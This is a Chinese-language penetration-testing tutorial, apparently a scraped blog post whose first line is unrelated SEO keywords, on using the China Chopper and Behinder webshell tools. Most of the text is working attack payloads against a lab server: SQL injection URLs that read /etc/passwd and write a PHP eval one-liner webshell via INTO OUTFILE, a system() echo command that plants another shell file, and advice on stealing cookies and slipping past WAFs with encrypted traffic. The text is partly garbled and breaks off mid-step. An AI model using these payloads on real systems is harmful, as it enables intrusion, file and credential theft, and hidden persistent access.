网站开发域名注册功能,做网站怎样盈利,ip段访问网站代码,司法政务网站群建设找到了漏洞后#xff0c;并且上传了木马之后才能使用的两款工具
中国菜刀和冰蝎
想办法获取别人的cookie#xff0c;cookie中有session-id
一、中国菜刀
1、必须提前已经完成木马植入然后才能使用
2、木马必须是POST请求#xff0c;参数自定义#xff0c;在菜刀里给出…找到了漏洞后并且上传了木马之后才能使用的两款工具
中国菜刀和冰蝎
想办法获取别人的cookiecookie中有session-id
一、中国菜刀
1、必须提前已经完成木马植入然后才能使用
2、木马必须是POST请求参数自定义在菜刀里给出正确的参数名。
是属于辅助工具并且菜刀的传输过程是明文传输的目前已经被WAF进行防护了。
先看是否存在注入点有下图所示则表示存在注入点》可以进行接下来的操作
http://192.168.74.133/security/read.php?id1 and 12 union select 1,2,3,4,5,6 有文件则说明可以读任意路径的文件
http://192.168.74.133/security/read.php?id1 and 12 union select 1,2,3,(select load_file(/etc/passwd)),5,6 写入一句话的木马进行探测如果嗅探成功后在进行大马的上传
http://192.168.74.133/security/read.php?id1 and 12 union select 1,2,3,?php eval($_POST[a]) ; ?,5,6 into outfile /opt/lampp/htdocs/security/temp/mm.php
在post中写入PHP的代码aphpinfo();可以获取你想要的配置信息也可以用system函数来输入命令 接下来就可以连接菜刀使用菜刀来连接木马然后就可以查看到服务器里面的东西了 使用wireshark进行抓包用来分析流量 假设菜刀被WAF挡了
二、Behinder冰蝎
冰蝎是加密传输防火墙很难分析出流量特征比较容易绕开防火墙。
所以需要先上传一个冰蝎自己的带加密功能的shell脚本这个上传shell的过程通常有以下几种方式
1直接在命令行运行命令按行用echo 写入
asystem(echo $postfile_get_contents(php://input); /opt/lampp/htdocs/security/temp/muma.php);
